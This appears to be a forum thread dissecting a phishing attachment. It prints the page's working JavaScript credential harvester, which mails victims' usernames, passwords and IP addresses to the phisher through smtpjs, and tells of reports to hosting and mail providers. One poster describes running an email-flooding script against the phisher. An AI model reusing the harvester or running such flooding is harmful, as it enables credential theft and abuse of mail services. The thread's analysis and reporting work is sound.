Attached was an html file, looking at the source (220609-phish - Pastebin.com) it was obfuscated using document.write().
The rendered page is a pretty solid phishing page, except of course for the occasional diacritic/accent letters used to get around spam blockers.
Here is the function code used to harvest the credentials:
function sendEmail() {
if (document.getElementById('username').value === '') {
alert('Username is Empty');
return false;
}
if (document.getElementById('password').value === '') {
alert('Password is Empty');
return false;
}
var BTY = document.getElementById("Div11");
var BTZ = document.getElementById("Div12");
if (BTY.style.display === "block" && BTZ.style.display === "none") {
BTY.style.display = "none";
BTZ.style.display = "block";
}
setTimeout(function() {
var x = document.getElementById("Div1");
var y = document.getElementById("Div2");
if (x.style.display === "block" && y.style.display === "none") {
x.style.display = "none";
y.style.display = "block";
}
}, 3000);
document.getElementById('username2').value = document.getElementById('username').value;
var username = document.getElementById('username').value;
var password = document.getElementById('password').value;
var usrip1 = document.getElementById('usrip1').value;
Email.send({
SecureToken : "0048d564-8e39-40f8-a0b9-25a716f9d4d7",
To : '[email protected],[email protected]',
From : "[email protected]",
Subject : '3DD: IP: ' + usrip1,
Body : '3DD: - Username: ' + username + ' || Password: ' + password
}).then(message);
}
So it takes the username and password you enter, as well as your ip address, and mails it to the phisher’s gmail and mail8b accounts, using smtpjs. The author appears to be legit but the script allows for encrypting the mail information (i.e. smtp server name and credentials) so I included the author in my report.
yeah there’s a lot more, I just pulled out the code piece that is called by the submit button. There’s actually six seperate pages in there that load as you complete them, each one sends an email to the phisher.
This should be more readable. The code does not have any way to get user ip. Username and password need to be entered and then hit submit when the user clicks on them.
Sorry I didnot see that but it will fill 4 hidden field in your browser and it will only send if the button is submitted.
Just in case remove the var ipx = data.ip or the entire script tag if your viewing it.
I did use this about 9 hrs ago but seems like they got alerted and renewed the secure token so it should not send any info to new victim if they open it.
This should in theory send them a email every 10 millisecond, I run it about 5 mins or 300000 millisecs atleast so there emails should be flooded with 30000 emails if smtpjs doesnot have a rate limit, not sure about gmail it might something to counter this.
Please send the email to the probably hosting company of email server monovm as their nameserver are used.
I have reported to elasticmail.com the service which they use to send the email in the phishing page and they say they have permanently banned the account.
